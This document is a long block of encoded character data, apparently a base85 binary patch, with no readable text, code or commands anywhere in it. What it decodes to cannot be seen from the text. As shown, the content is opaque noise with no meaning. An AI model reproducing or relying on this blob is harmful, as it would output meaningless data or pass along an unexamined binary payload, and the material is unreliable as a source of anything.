zzq#El2hopvaJuB*FR2yju$TT>edXGx7|8Q{7%rn6&v)>s*M8t@MpQ8JvVGow`JiXM zGoh77C0Dq7j64|s19qYtB7FZzc~L^nDs&vLg+7a>q-sSWnom?!zlt9s@jhhOdKFG5 zpgw`G!JmO`TIPx5r&mjFV72z3whchAjd>T5RIakrh|1x``%@vGsAdT+MD0-jy!W+x zkFp3^V-4HC8cjyDzt52Inv8ahS{oW44sc!n0^FB;z8VrUfqOE>S4t|=)_jcmw5P=1 z92GKNK0{2t8F2SqD{An1 z>2vEQE4QF#*>&LP+meU;%ry{w)1RdMPw0(j^ga*$W>(mQWst)8x=`fH4CwPq+tE`7INW#wmI%_|A z<5%sH&k)U+3r08^A$lnXhEh0;U&UWo5_HkpUyQ(XJrSwFg5)v=6mbD8;8$p@gh>C3 z-C&jjyw?TmK)4Eqof{^b2v`+7=LTD;_k$@3fO8@isS>D_sKi%}KV9@imj|IFO(`>R z5S2%~*g#QiuqZhAl1gCXeUw2W(uPF_Rj&Vo^!W*{2Fc?k$)^c$w!$&fJ30&JR(&;_tA zbu+HSA>aZw^krt)-MLV-O7PYBaQ1#M`weM+xPG}keW#HBCl*E*2_>#RNe;soIlG`L zV*u_R!G;aL&P||>j@W7s;%W|H$i)3PrtcG?Z$Qwi`ygw^P^rdlZ}6-Mt0>|aDq9Fi zE(bi!N3E}hNf|{^&ObNfWj#7Z&F6-y89h{xB&O6v=wZF#D&bU_(WvG~vDE=!(rg)Mcao`yRS+}_ib)S23<^IBCSSW2gmqeeGS2{QT;^w#IOouU{#js zN+D8;71_4L@Y@H;y2NmuB9R0m^rbX{Y0P`kL=yy}h`QSpEd#!B-;t^O7?zM3ph!l*piL_M*XN+%JdtjWJNOWjwKoW$mZV3jt2nE|@t07eq4e z9wu8NF;Dt4$yBlcl}vx`EKatIuWNyWBp_@IKqmu8Kjd>`B&8|&rI9Qi?#R1VSun63 zwZ{{>WX6n+ct~^h1&_>&$^15;WLgzG?}sR+azA>bmluqZ?yH0=PXLCYA#BKOI&2mV zHb-dwjh+*aohidrKOor$_?eWA-_0X0&wFSTP0<{m+5xB*0W1{A*|8EC&V7^CLWXn@TiM2z!RB$R 
z6qWh$q=hoD7BQIrU+mp=P@8d_F8U-Skf3jZTY(lYUZY5nwiI`FmjW&BuEDhwinkPZ zYjAhB7Aw-?(gLM8@uQc87LvT||9EwbQ4Re_1NUv(qJxh|PY zaoVBoU0qokd0D{Z8!#M+s@W!g)X0xlf}DC;flz_eJgvm;FkT9w5VlC7`@nlyB(QL2 z0Uu>hfCA}O{Z^@_;eQ9Mit~>In4Al#4~w`~KM|}}=-qz)B-t8^4j;(l$B-K2uh#&j zarNUz2|kYLd4aVrN?3R=)CHPqO{x{ihR7MxnJVz>wA1T!o9a>$(iv9k^l9r&h3n1r z>MgzNt<&pYH`UuM)W5l`ccA^^B>cri?~9xF7mxHWUQJ(o7QXmhehHw(1PNn8^e|!G z7<4)&vI!HtfQh}t#M3q;3O6L{HKceqq^37~Xllq3!SeV{e z+|*dQ&{%%iSV`MdE!0~ zG>=|3kJGkH3b(Ad0zwmV`8 z%n}2UK2iprh#)!bfO=+R6C-JEJ4&<^`J#cEeF*7yKt@@Ln#w`mBSeacprrm#s0>TX zPZZqd^t$ro3Z;M%9cju7V00&xmLG<2>|v6?QEOHfR~GPn3OEc);0LN9`MYqKGI3S9 zX;<5Xk=-X%Rkt|-kdyX#94UD4k^r0A537;}96N!)4^T(0JHr6yeE_LGz=iAr4x#bQ z0OCMA#ODc40{GJ~V9h+hU{XOik&Ne9g$Tr{Q+*Fz<#Ej!1g3%4r9hoPZ_8^SyL5nz zX&B@4fh3_rAfdncYT#uxlqxsxz6z8uw-0xMh!0FO>Vs??zmpFq{dtOv<^saiVX<65 zk|ZD?4)Amh(>ZeW{OITuAr&ea#pi$U^9q=Z7D0k>HucAFkfTsAekzwlsR)^pb@HER zK(VHSX<`gG9@x7=A$?J;%}8y*i3hd7sXlY+HtF-|F(v-$i8WwB1XaXG9om5UdlvD+ zWQ+(bye&V97x;`H8$1Ea70~Ub;NeEm`T`|56*=uHRW47^s+B1I=@*B!8tujjMO;vo zQF7#z(kCJE37jWW(u{%AGKzo+u0o1U|9WNBQ_7!$nb#i6}JmUNlh#OmUwyDrT0LX%Uey`wYCOG%>4l?;F66Ge|_%?}Hi@MGBxg zDOTr*uwZoG$i4MJ;Fj@)Cwv`eMB2o6X|yl7fp3pZz@GgQYN8iv(nr*>#CAPFZn7My z!mS``3SkZq2%N@2%FTR7ZhaD%29|^aaYU4Rcsmwxa&d$XAh=7&IRk+0=XasN_fo5? 
z%n1-Zdt~Q6B#s`H)F^VKG z1nR{}?YL%0!Q$|8L5OH9Q<^_%ox zzRHqOSH%&gLw4V;2#EQK*CF}#2G~|WRVh4RKoY?D`%cRMPeq`Q5$NOF^1A`*vC|vj ztAq3s>%0i^nn^ykpKF_+NJpk{h+7wla{F0Y*B*hvh&yZet6>Zh=s+(3E&`1EP<(44 z&nyRoas(vJpCo6=j6*hTj$rr_Kas0TN*zBL9Je4$n>ffV`h=~Ds<>u)6s^||)2hOg z?t$9^nTi{7g6?gNvgc;%K-wsfmxUS~1uSJKz1s!qZpir5_r1!Hb*)@q%Gr9C080ZH zDiP`v3)q+49v${rz)(flNN6^7_qSS!jx@eqz{E#JxfRea`lS&- zq9^gF;@Jb)Ut_fb!22uU5!c*$EA^%yb+p3~s~U{+?E}&d_)~%36j;YigyR8ZwGV0n zHCz1+cf6yKLr^~gAbtZNF(Cf$CNwbPc^s{IBl+{uc6^gid15(yFgL{*N)rdp&WDqm zC`X@r2nEAlt*%q4a5SsJ)Rd4x@~Dy<1!|_%ANnw@3gr816emr9YAlLd36R?ZO#K0G zF(9I)Bk(P!NCjYwK=m5}XWR$)9r!dRe{ef?b0$Wfn4FVL_#zAnpGZjE&q7uXuhH|6 zmOYyyH}F-_Iukfl&U3G$;s5oLX@_7{=y`dy9P1@SWtc9vbk}f^FhK|-21JovK@v`+ zkILj6&$z129xe!Ya8KS5X^D7RC?ZpaUnFK}3 zK&jk9Zr%#im;w$;q_J-R`epW#7~uXS>V$i983JfPiJ7&>jmc^7$a&0X$5)@DHNpT6 z6!Hfuyp#)4H9PV1RXo$nSZ1BcJeg;Amj#)fC)edt`7K8Cbfz{GGM>8rTAQ2NRLYSE zC1%l0W|RtZcJq-pC1ZMS%@?|8ZVYUX(oj?gt0?gaE_4@|lv$ayUnXAgg(<&HLz?GDS^2Z-DyHWue< z)H<_Y#<3dAAKOe9X{3)f&;PZZt+E))H&{5q+AlUxe);-+;q>iFM<@xK;o_NNR&xT* zcena;r>%+4N(F}BFI@L3zKD)3eZO=+SnY{pGg`XxJl>wEuv%Wa_C7mYA1g3gzVW>} z|NDD$c^T^u!Xa}IhY&nG5QmbgJ4oQtx*SNr?^L5bd^a&^CMLs;O&R_g7QjdB#=C(EIOSE#qKvH*M3X zMJXuZC(;`LB?c5^OEXC9EgKhn}Wrp)tPpd5NlXI(_ zU-ZDkjQw_Wwn<4e2R zDNS$t`USVkX@R8_?>CLR^_Op&|9tiSeIU4U`L-R0vRM)I;_lCb6be}%hh78GMW#n| z7derg1xuZ25dc@?JsEa(|bR!oo{+qM>{ofwQl=Or#IdQuexrS zH@coMO#c|u66+v@OLPDF`?Kwl@A)n-KzjM-{RQE5jABj!cAvxT_!1v`;Vuqk9k*P^ zkvkyUV%&;h35fo%qPKXOi9^Nr_}~v5%wUaeBJkSsN6L%CTunPk^5a>V@&J6ZpY83| z%ApVFVhIM==&2|9bdg-zd*W>ID0V0%3H8Su>GlRdd=m0K0={Fs`u3e;Ctm1oW-YX&83eJ zbnWceX3WJWI*`Tz#8J8%mJqzB-3n{%a$$Q@nQZ54PA(itw>t~92E+(;J!lQg%gLhU z%)joY79>$De_U!OEkQmB4(IyFTu5gvGc_qh;)a(;ge-DRoP}i=J6n7At4Wp^PsOMH zG3RE9f2>gaC0PjiarX9SdSe5F&W($?40j?fL~SC0If#)`6ru6XOM}z1oe9!YJi&?g zDLKA?(}2ZRXT(dhHeaL6*1}fr`-LW^SEJndv#r6tmsazJMuqpft+k-KMbFZEV%wJ=>QZyaO1_19Rn8ip+1IA>li zE@^`sr$%H*^5hI`48P#buD@|_xlFl(S!w!7G=7_(7#`c&erwp8?x1CahhyVaN`TcR$+dxZ>_W`Ftg+dzUa6VVs2!%mR<|T&O#s5e 
z-lC@zi&kd$g2L^@8DUsPr=(1udN$4EEczlo3FgCLwg;MncZ#YNTJe*}pNEv_Y#6*3 zgN%o!rZI}%$VCn4TLw03Gh1t-KfJ0Ac*4fl?}=NPNnfM-EIe-1{?IwcApA!Tp)R8w zA_5^EWc_?oqsxx}dEVP67Ih*Wld?p+uKf)*%Hg`xpIBXsw!5v>3Up^mEL}?su3u~S z>3*%rcP+E`wbkF${noVMTH$+bYmBEi+r{cu72|7X&ZajvWa(Cud2MI?N^gED->t69 z*WS)bZ((7>?MutGy+gR(;!jrhh7sR4E(LnucP-tUzF)ub=+j&JlkeWL@B7wgQ*Zfl z!@ceL`fUK7{t6D82eyOA&mn|Of0e+>ql^B=0sTt<2Wf#v54WFVw3Yr(+D(r>(HqD3 zaQ(G=Y@P!Oeon~+`s??tJckT!oKpMrHy#vtj@bJ-XKdwnGGTdO#jLmy)#Lum^z+m6j z%6sAajT@%V;FoiO_xF82_vTH5-`<QRrlP-f;!5^uf2p%ecZ$)*N2=pTIbuAoMdfkvg8^=YQUPrDeWk z)VVe@{hhp!9dagM5~S=$Li$ro`e@v$|IE?oB|2l7d;Q4}lH3#<7}AFS(xCruNu_Vq zipYtYD0-_kn@T+G>{)PXOIG}|u=b#1IkC9emIZNf^j7oggJ+0`@Y72|0xtN)&j=zi zINn3}RTKg?{0zH`52AzPJVcXUp{e#FsL2p8E_^r_!Fsv~!CrgzSqn*s2os&;T`tLc zB9hGVk}Ud?tag%YK9cOwk{lV5oTZZYnB!o5Hd5ek@_B-jufBkKHA4LPSoc!sY=&JOvh1t(X&N_Kq-VA^E`(N z3=zMVc2W1r<<86guD>6;qLD8qaySU8UVI#XF;$%xsts1QLz4%$V7_BU2Qq62$3n#_rv^Iz9lEL4q(?zAe3}^2{i-YyZB22j= zJk-%@B02oQ2t5?~Noj;+JmP^J{Pki)02ew4%2?&W`m!5AF9_H3K+}l8Z=4av(b5?X zz1VoTWI}sQD&O;$YH)SuC_XNDEHhkjE!t-fE&UMw(jlUM8=WAZ>suP+XP1+a+Lx&< zjqQK+S{V(H!K0uN+H}zX^&r5}o!~Lhe)ust8vceW>VrCZ-aCq|_&NGaT0{^X_Yloj zIhd#{kbQs?YCVuTK2T*`9oF6-zXA>l03`$j<{YE*T_l2M%R{Ilbhg?sYlG>0LkaBz zVcIg8(ivr3k--lMI=JM+J!FHG2RYI78BXaz(C%C+mYV3{)U!_Xtp~x0e!d6q;X;oS zM&cX{#jW%NuXHy+`_ofDX4k@D$Ka1^5iKqek#GbbC}RF0fs{6S!aToS{1J9E57EIK z^@BO0s}wSroDQG|WjXPO^Wt2N;k*vd(SnN0+7fkZ5nu;2B{Q7fI54rY<~JE!dkgW@ z8xejNA?t$JOpZ7vM9_9coIttu^wEUYN_oeTUh42Eb#y8;vfHt57SwWi3?CVeNZLaO zy1@6<;T{hOSb?#0ZBdnIIIy%p!_EBa0J9R5m0F-*lozx)`>P-f@Yz zSY%0*9_RF!{GmNElL~1(MtmVe+_50!qK9+8i^H*hAxx)MD?N!#zeu0-fs+%(u3bg0 zb|dbyL~hV2RT!)0%#PF%0#3Ws1|jm zu+Tmo#xDPo9xco=ouE7wMx~y8Fy$r!udgMppo@5XtdO`hT0u1;upgo58!=w162vGM z6+f}FI@6ar_>o;^Ek3NeU1P?&zk3`S9zXpaq*5V1O=9+$$sR4)-1jkcGz_HKAE16) zS}SEw_=+1&#|OuUA?Uf4ybs{a_lfAQ(E_etGx@&O#D7DlY9>``<)FL53UT7vwaN~) zD$l+KSE{E2n)h|S>4?JV{zlxvbf}j_@Uq~m!3b1|qOlt9BAy;kBuUS18-M*wi2sHj zZc84+(5VRuMacTTs*C5~!ViuQh10xi`CzRTm^0T-H5w5LSAj)D#-JTUquxJ?PIX1I 
zv!Ji1?*^1X+NUG<3FfI$a^VL!g|LVsizM9Zh~h`7r7Tendy=q2?ZivI^c; zVsxHqbWvt>*2Tr0jTqiuBZ2-m8RVBCI*C;pSvdGN-|C>9S~PLT15L9jVh zFclg+X2109FR6gGagFr~UYPOXqcC%22*Fo<@iWMucVrtQ#@X6InrFrUF~~S|g>#l* z*uqe@14j01g%a0f&Ej_a;{DKd5Je#wF)IPdiOHI)5kAlAps1-#plOw~DT}2MqauVY zU!Nl^nH!gYv)puX1ZG7Q%-R2=pT+cE*fO^I%#@E9grqPXun)YOPp0J%O6+FLXSfWa z3NsHddf=x2v^-g;)r=}^Ma%XeM&UkX$)nRTRV%A7&~I zQ&J4ow1ycl8u!Pn$xxfihOOdIh2m*18?lEGj)&Rx;|>(A5A2)1lCWU@wMrrwAY~mQ z$%A793bs4LHNy>mQ>d?&LS}F$3fC{h&@V*F7>BbzV0Asfln>Y8EX-jx^o;|=BI~DG zmN~QA3Ze8Gvo?fhCHSvvsI+v@ThQi^!G^TW28Ww5r$ZRtZ0y4o2sxGEgB1u1I&}E6 zm2}l+rS*zAdl>Ug_9F{9F*T45vIB)X#BbY4Lpa%k|N4f!ssz95-SYan#St6)79IMAedi6;&MVCA zQy|WOp92OquL56JvcC?Rg*g-knh6GwYz0${L%10sEGGIzH*!MMwrPw(?*(@l1abA- zVcad~H{v+GLWNuLyt<&*|*8?gaO)!RT^Nf5lUy+{TZT=^b&W>%6D(L@HX zWko0Bk_Wm*JY9Pe#i!j4EPN~9%?9>Ur=y6&m%#HN;fpK6%NGIqQks&F*z$a_<_8BG!Q06rPGnr&>n+89v#p z4(E6(r#OsbXyH-KN{?$<5WN_h$_P#IB!YMu@q`!gT!}!{51zGwD9A^#$3@7rMaaF1 zQOSH^#k=;L9S7&UjiZ8a z4mc)gFT?>j3fu%+RnG4Z{8pFGg~(jEeL;0A?3m2U8! z$0#g6$UV{6El^t~i5o5JkFGEKq~QX`8T5dX!!^g;g!kaj4Ek$Y(gKX&CfBFqxCn?l z;<1BkaKC$erAKhisnhQWzsd8kfb$G%&s?gr5A0_bJfyapksRdb3DUY1n7$Y-!UA{v z*L{>9-Qgx*;0vwpp{ak~uXvUpcvZ!D7K0F!D6fouuMd1~S3D6<*&~=w(Pn~SG90dP z?J|W%L@tzYDfc25lgqe(&xyxgf$g3_@VkQUgk2;N{kUEU?3Z!Mm+8P&(%Ej97`lNZ z0>c(DLWwZSS=Wu6M}~-O$@v} z(BM<1Xlnz3U1%iri$%r+#yc>|Cr-?mV8*~u9HGPvX$RebPzyJ*RdKen}V!_BS)LBfnW0 zDw1`D=B~iT@P{YPUyHxImJTAo?NxY6Q~5oJLPkjY{=xXyDGgbzX7sm0gXR+QJNy?7 zf0nY9?1e@US7%d$>Z{hQB9DqY2Xr&v?w5IvEsw+M7&K$AgwGCsoZk2qS22G~#4BuM zwZ66qj3p*}%}6b=`YQL!=O1N2Lb>ufw>g~>na?X6t!|>)ZVw_M>uC$Rh{I_gRj@Xh z%MuuO&WpwIbVa< zYY*+vr0>%i(|+S6Pc!-#4R7)8q&IKt`A$=X`pMByK^qodgs%g(OIz7taW{jni%9sY zvYOzz$mecSJsJs6KUO&x6{(hz?k)wAEN%HJ{Y$eSCL)_18u+>AW9dr*y9xeDd ztEA^eKS<8NNJhQzJrsF3@sgH%ib0Ga^B#A(arMJ#6*EZxfb2R`#v`6nb7uoRf$mXg7>XLyJbzWhuei( z$jjZj1wY|mzb3O9_Zlv5gbz9>n=bc?3H(Kl2JT}y4!e1=BF7VQyjFjTX~jfO=4{)p zgGc*rd=I}li#x-}6oCj-1`_M1gOUAB(61G~B+a*xp>{1!{#!qaX-4>S_RfUsw}Ev0t8lf# zPI4N%K=$T-0v+})>dANm`V3=PQ|&JLqss6xT_XuEEfKmDW%M(VyQm~8E=Hkl4@I(% 
z#P8U9I8>49^7{Rxj)kq9PE}Ec8Pnv!+7jGhzoRV4D91k!HpQ@^M@ji2ES#ATaVjbPcjZ1TT*B3|_?idU;HqX89%mU@()qEJ#w!*+ z73vO?3xU*Lk$mO|Y6)|JnzRA+4X#X%5t|Rl51;c`AJ;^5Tl|_t&tI_$c5#e4Ce~zZ zh_DGw6^*)9*JS?kVH5euG3Gg0lXcR}_Uup5nD0?d_RSTWI1cA{AgVS8SCn0nw0JyJ zpf;D-m;J>(&WQ-s+K&`1>{1VkCt{pxKi#=zmwwJUnUGkU$12Jpt5!VuuDbR!k1vP3 z8Rt~mWNrTA77j({;;GD|+Ja}-9Lm9*)48a+LMc&B)uiI-&jNKtioTrcpEzfVRO^a0 zTR2}Pgv^vJsXOXlb82^SeyvLUtIWv0ds8d>s4fUkh65V_>R9S})bLTmTZh_!#H$j? z#|6a`L=(QaA!AN-X@64Ev$}_Mk47>kA4t` z`+Yn6HznPA$-9vSE%><=@*W4@Q!pzW7Zw9veK>)`P9aYP2T4=}SIE|cdg?eL#}y~L zi+fU_ZM@aIJ_aFR#JY4xrf+0u!qj)p(jRxL*|o98YAE9iAyyG$o`G=J$*f%YQ>}=R zgBeLWYQp;=eIMrDyn0gt^ut5?wSqbWh?cc=?!kKp<;%?nzd@kG2JJ!F_bUglvB~Ndy@D2(F>TS zZ86^cn@^76g<0mVr5XNEoG8UZZRFU^E@&K#wT&sT&Vww!r`en;sFuZh_N^@uRAJls$(GE6v|qZD zl*EwV)Ag0Kiyop^`h{MeVTCYwbt>UQ^QplSG|S_=tJ8Ub%adPDV=4&&DC734mObQo z`BjZ=?1MBCf@=3}J($-MfZQ_r6D6QDzv0 z{O}f=@BiE5oyM4bKbmrI9Pgve4?WvUx~D#t9wqS{RG+&ic#%D2PM3EsXBGb}_n*Es z^(v-nW4`2-IrYVxuX};#b0>P*=mZM=cfnRr5Z7Z67pM_d^^e0mh<_aBX{W;dx9!@0 zeVC^R)kpZ@AMM(I1-9B&W>x&Z?b?4n%p)ym`7iC-|Nn-0{=czn{|{{SU)rwyC)i5s z&G~w&Rr!Amw#p}ZnB4xmo08n;us_Pn=jbS=-4Sp2|6$ku&%svWE}l67-%CK*Vd4J~ zyH;{GGxvXYyY@c}Tiq@-knZ6BC%ZQIiDRD1&q_qLzw=i z(oK@fbnn)#{d#NH7Twylas@p+VZ_m9dl}qzfxS~z{IN!RtMo&dzGrTu(ZSJloFYN} zlDGni?;fnNkQNLmQV=J9BFx}Wn|q?!D)6?t)Z)8C!w}|NAl3ff2LDw4uw@F-hbhAJ zM>TWUM{oQd*#6+Mni+2xEo^v@rSNG}G%0_~kAf%%N8$ekwt6zMt@vNSuKjPrJhyhO zq85=)I22wjDe>YL6Acit7LPr`d{O2BQndQlS(gV$1^**WKeJ%j95n2Sn{oL)lf z>s@1#rrAEllj`*AJ!_?=`ER2q^-b6N4slJ3n~JB63)jCq#+sH+M^9TXeWPThyy9?_ zjyp&Vx5C6k#z`wYvTyC$!^gPbAC*M*+BZk3W6c}?09zSlfwD+iwq7Y+Os3x)e_ocN zgL8u(8@yH=h6TuBqqKQwBCEAOIp50F@57((*sH@<0C)u>8u;`Ox1EH}FA60GTu;%G#2W ziWG(kq_c)XR{|Xp0*zUNc=@5M9zpD>L7dh>P7*=78$sMvK>~uoj^JQ*%i#O`!9uA) zkI(_gt>6c_!Eyiy3IfenLfJh6Zty|`a)WO>2IvmJ49fn`9Vi92%(YTc0$b4C0*HDg zt}2GWBOz2;DvXUO_BeIQ3ZsXqqU>;^zB|NjrN-`HVu#MW z>$ZSh_gDy1+#hMsly%&9#<2MVFrGL_UmV665H7WWr;35Z@gXc6B31gq(HLNt9l0$H zAS2?4s|ZXnJ}`+mT>gYVR0(6+v1_TwdN}fQHi1S4SgDKy9l)`vV2{FZb;i(kahRSs 
ze*0|9U2I1JWfj2$JJ8#QWJt5zKqJqoVu>X5iID{Jl~J9T5=qx)&v6rQ94B68AoW$;n5kJ zrC}nI;Kz8seJF1LFsUifL%c{25PjG!CKF1Q5MR!YJW2x?WP$OO@R2ltQ9Nf?>`5i+5uJ{4D3IiF(QEdF(Vk}NDi2vF@W zE@>#r^g_<%6p%<1-%BV~v@E6Wh=g>Y2c81WoB-hpSoM}^F8sEXYuALiRk432EA(N zZ6FGU@}~o`3qZF}>{YI~P)|7_xDw(RgE-8>2Sc7HIEOe(o*y`E%hxWA2l(mM!X&_lG)PT7YVS+!&=RCN0fv~r_DMV_ zZ7%JJ<|i*fL{bi#dK~h&JylBhi)&Ny-KZ}lCQ-g}fImSFeF6p?l;eA;hA;F=04 z7GH#;j38M_6yJ#wJ!w+KrV{8W$8d{-crS=n&#PQ%D|7Xb!3))p+-7J;V}5$+#IEUS z6Tor-Xb1wl#lSnZ&;`ME@YBcwZCn)$(eEf^Nng5nLK{17he>)h2LX~y1oNCWnuain zrnH^eu|tfh<1T9_8-MM5I~Ww-$#E5vf)_>C4j%o|t|!q+E7ir4P|ZykCA8-=fOoqp zgW_?9iNsY$G1{}(qodfP`!#k`EFAk4h4Uf}}Op1(5>yLc(8JW!(nQtChTpU@t8d;$m{UI{Cra!vjGrE;Ay3;(m zw>bLiYV?3^>_}wnSbyxqXY4Fv?4o(>YH{r5Y79g_4iO!P8jR!mj>9v@@khqk8pnyR z$AJ+pRayCer)L8HrwF9`zeOO(e~duHY5(I9h!ZaHzZrqps4@JT5y-z<-}8SWkpENP z^S@Dj&;LRMvP1vSrSo?;?>|H!>9-Nc*?x{A&VND#(qoYm@KZP-3m)(vi9r4<)c5>H zBM^uar1u}|d*o@4a#RQ(5)fIB%fAyzQkf|Im-RhrJfedCCF*mHmqdL^Bl6=U=Vw@r&mESDrwAl^F37K_{XfI@*3)kD$_?^6-Tgtc@Ne4Q zZw~!_C;oHWTYI!R^Tsj||5JMp z1EYkEuJ(UMeNWj94iBc?Na_o$y(9G@bFcWmlJ+@ro=c| zhpElB(@S9OLdy-N6u6+_x0c-*B(=9*hdz)=`lkv{8zfGr4etY2&F4tw9 zU?I;A{HT3qzr?yX+`Hk8EP%`uIh^(VW;sf#XkPylrZ-{+$J^Fy)WF5_Y<$r zPbGg(>E`cTj#i>O25;Rb{g;lbzsT*ZzVTSx%;ISZ_xotG+{UrHR^zbL@s=C|n z+y&gUCYpUU&&=33Io5n6@gpoq8glV!;2HL>1c_fgn&Etnw@r7n;$pHyjAw82dgo;j zUfQ%6J9|9(Pb01W>X`q%Yzt)PI$*g11grz!UZKFLNQQAF9iRU7rcc*<6tW#4J|O2b z28b|*NNI|(Z>0FiDAof%*hHY&VIax`B*GuW1BSwLf~W$adlo^afk7%NAZ85mAr-}A zZKMDmN(@aVQ3yDVBVSVCB07Qw>w=9Zg3SU$?yH1Q<%YcK2bh$Bp`Uv4XXJ|76igmu zrpg9-TjT~9fH4OkiAU0|-2M|IwMqqSFo3-^GDI9OnFVM9^v!0;E&9Xg!FVM6;p9wc zz%dXdfp*dc+zSmyHUmkqf@oTmP!;}g*+QgG4w7CO(l>)?or6p)qC7jPD+(9H*X?gFvd*4G)FmA`)O-od%O2nB<~l|?VN2FIOj1K8OUsbSa*)f&D#wQGL2zwBFC8kxn*zm~P0V zn#iog-m)e($RAJ1s&ul*9J3@7vUWI-d(>pV&a(hywm5(G@iuUBPI{J>O<0xvY$E%n z2&jn2T6>y9tdg_unFAjL@Hw*y=X0Q(@1v}ex7l*<9p;=;=ThkcG=tf6^SL;OxnP=) zcOyZ}^P~{Yj~s)f_vdrD8%cR1bNP!&A8_VA`at?*KIds9sc>YDs4S_NP>zHU>GPfJ zmz<=pK4gQ6KeBRuRM`2bbW4G8eo~9f)p-3$i!)cJ_>{Xy-yZ3z?nWIgc_Ou 
z5EEIPjh{6&SUl61`3=8hPB(Kww&Xj0=5l1oYGcOF!IJgY8JqZ}+cX)wvZecj>AxdO z553a=43_@oOh3ghJLfF(74pl|E&h7$g*x+x3>83k(YW4~cd9DxBFhT5E1AGmpUz83 z7AgvDsz{@%$Z3oH1}hnJs~9D!vN)<4B&ySFs_z6=Cl^)IcT~r1SJQ!OA~|Yku@W_* zHZ?SXH33C6)Ezb6+ci|+S~rebN{Lzrn_7y%THB&p@{U@|?OHN$oe4)BsYIQ=O&uz* zPOGR6*-@vuT?gd4WrM1jcB_7B)m!c&O)mlSTh%10eygC~p$Tcf3m7jXqlBx&UVU** zN4~I1be4r>8{?TfV9;{FEop*Ng$Xag#1b?_-ETlg;l^CzMcFpo25|lX4XFf#IIDQE zw1m04n4J3n#<&s35jP_WQxF9zYQj{|HkAtlwcePTp@vL3Tnrz6;V#D3xG6S@pg!vM zr3iEmntDs@aKMCJ3(Zj_cCAsM(I!myeW0zfDZ?9gf)SYUZjQq;0v#(DzxZZ2Uu%?J z>(cJ+yTZRmf!tRx=0NL#H>Ot(cPa|^NVsJp0MmQf`iZe^gSI_ZxCPpb!C7o9yKL2| zyal=2V@n!jExLe?RTRwv?BOc?XBhxjXDlZ_ql+C z{6@OH&H~!5vP-o$AiXUohq(4K~9V$V9`uT!S@N?`y6;yJ*l6 zL7#a*U!-@Nc}{~{b5pin<2^3mj($_y{ic$Vc3!Mce;8didbl5RzxmB@)6{Nf2f;wI zZEIp!_n>W?23PkqZA

06e~BXsBgLxOwWbC%mL}Q?7M`fRJ;qRVSl$inc8>qm4Kk zbe-N|4r)J=Yr~7i;BvL|mA0o2wKs`$yt`~a((7p6>*)3FJR<01DeYhuX{6Z0d#T^` zt-1g4V*f+^=F{}9RG$IS(kA)nfp2o%&j`C^TGxmI3?AF@r(ajiq zbA@LzJP0Z4gXFeZh`{AC`fTa?-1K|lz&PzgYFLeduZ#?d@H}1YT zPJTUp+SCVD00Mw<|AWTR=n)80=M-0e3^t<^oY@q&*Z+gCIYMMWyt%7KZZMHzyx)85 z+4t^ny)iMmp<=@EH_?OBLzCqqt*220$3uhWAb6F?KzP$&uYOw;0laY!vq4KVAJx#K z-`*$x)i$P`qO_^0Wcc++$B_OAMf0S?NawQMh@4O7w<|n0yQw$&T|Y&-jVkF=X9^u_45w9ZGh?Pktw zL=Bb1AEp_xj2G&(>a&X;YZ)X);#%y zsH?xMD?Iai;PB9(0`7+X_m!*J5uzVSqSIMi%^$f3eu(z$>JJ9kbr%uNpAOA&-RT|m zUb@L>eL6Z1kyv*1>C*9C@R0{lWeWg(i+=#ZEq-@gf|G`d!|wWfS$otl3= zC_VG)@0xbjdb#*|kM+7yEK=7nId~V}Sb2leabs4e^7`|J-5cZ^o&tSEnA5XOGL_Ab zA2w{uH%U7-liqIz+(8B@`i5W)w@4hf`rmIwE&SzUp6hIjb+`qQp{Qjx<>mv5oRqL7Yo{dTAjeBj| zZLyoj#Jh|}M|ZOim`P$;u_S-kvv&L_e;J+}QyU#;m#^!^{bm!} zEg(je$H(OP;g&OgkwU{Vxi$FN)hPN|!Inu@{vL zm(^mIwMLiq{+F2S%f`0L!exk2C2pA5-(e}3`N~PN|5bnX)nMDz@bc9t_G+BrdQ$9q z+UWYL|MhJ4_5AJr*zwa2vA=qJw_O<4YeqL4{{Mil@3h_QwV64r8vXF!-xtFk8(~jw z&y{9lFWM}fs<1cM|9;^-vH0&BxA&AxH2N>%q|A*~mlkKcu|HJi{Ca5D49x5nC zc;`i`@~UJQ5&g3eDwQ8EBFXRf=88jg_@VToeo$)FHR(hag{&88s_U{T+y<>7)M^{@ zA0F8+b*HIqDrSlL-au*8x0FA=jJfmjgZj2=zJkeDjETyQda*{CVUO7OYbY(HMHLP1PiaJ=)^EdB-|HI~o%VroXDAVaRE8j$tn88C zU?`o=k@?^|Zlm4|oj;bNnW9bROJ&YK3}twt?Hfj~cVahRXTRK=sdxGY z^TMxNg zZ3r)y=(K?RljV>HiceMOocln}bWIf=`={0@iD97+$Io|M5`yAJ^TZWI!FFoOuNXof zs>(dNSKGq^U~)g<38}iMU}-WRs;j(WshiH@yjG5slYoGPmBiMk)OD;r*JQm-xM925U2f%uGE(=0pmv98VM7Zj2~FI3IGvG~|OZZa-_J<)f( zHa8nwMkn1ha200Z{=e9J>!>LBe1CixU}zYSMj8QWkPaPsNCA;XP*OxCq-%!m?vgG6 z=`QIOMFDA$?h=Na-#pLm@9y5c&+dJm-Mwe;-S6}NaL&v*ob!3TUl}Q(@;MNQ2>?LQ zUNy__&e)%=)|*r`H7vrhcp6N@V-DDJ!)bQ(2r&XQVMnt|Z`_b;%*OGe+=N0}?i6s3 z!vKCAA4S&2mE0RB0u=Cw$1E=TK*Mcmm9$OTFBq=EJr}9B)M%CY$Stczln}BR9Cd*W zfC271^UqOdmP?CzsTDNYyfd_6v`ElZr&^9O)k%K3YE2G!klISF{On8K7$%yz=P7Cm zl}{(!7ylU$Hb;>U9c3<-ZxgrsfW>xqo8}qMcep=Ad$w(q>3t*Hd2*N8w)mHH%DbQ6 zcwY)ddxCQOJM&PHaddzSjul-#*f%(n7?Ec8&59x&zt`dvde|jz*T~#&|Mu!&aMRGt zet2BR%P~S+k%0^?51a*R$YsTMA|wTD`XwBxR{fYXD@00p9$tGftkKM47yDP!Ke+9R 
